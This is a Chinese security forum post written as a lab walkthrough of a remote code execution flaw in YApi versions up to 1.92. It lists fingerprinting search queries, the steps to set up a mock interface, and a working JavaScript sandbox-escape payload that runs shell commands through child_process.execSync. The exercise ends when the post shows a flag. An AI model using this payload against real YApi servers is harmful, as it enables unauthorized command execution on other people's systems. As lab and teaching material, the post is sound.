安全矩阵

 找回密码
 立即注册
搜索
查看: 1604|回复: 0

vulfocus yapi代码执行

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-9-17 19:21:51 | 显示全部楼层 |阅读模式
yapi 代码执行
Api 服务,导致攻击者注册用户后,即可通过 Mock 功能远程执行任意代码。
YApi<=V1.92 All
icon_hash="-715193973"
app=“YApi”

打开首页
Yapi 好像是一个前端模板注入,之前有做过类似的
注册进入个人空间随便建立一个项目


随便添加一个接口


选中高级 mock 并打开
用于注入 poc:
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson
=
process.mainModule.require("child_process").execSync("whoami
&&
ps
-ef").toString()
保存后打开链接显现出 flag


其中 poc 的最后一行的 execwync 框是命令行


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 00:41 , Processed in 0.012575 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表